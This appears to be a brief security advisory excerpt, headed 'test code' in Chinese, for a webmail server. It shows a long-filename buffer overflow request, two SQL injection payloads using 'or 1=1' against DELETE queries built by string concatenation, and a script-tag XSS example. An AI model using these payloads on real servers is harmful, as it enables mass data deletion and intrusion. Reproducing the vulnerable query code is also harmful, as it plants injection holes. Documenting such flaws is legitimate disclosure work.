测试代码
1)http://[hostname]/mail/download.asp?urlOfAttach=/maildata/A..[approx 290 bytes]..A
sprintf(buffer, "%s%s", "C:\\CMAILS~1", "/maildata/A....A");
2)sql = "delete from mailfolder where account= '" & Session("Account") & "' and uid = '" & arrString(i) & "'"
indexOfMail=user2.xxx.yyy.com.cmailserver.3'%20or%20'1'='1%3B
3)strSql = "delete from address where account= '" & Session("Account") & "' and addressid = " & arrString(nI)
indexOfMail=5%20or%201=1%3B
For example, the user may set his name to <script>alert('XSS');</script>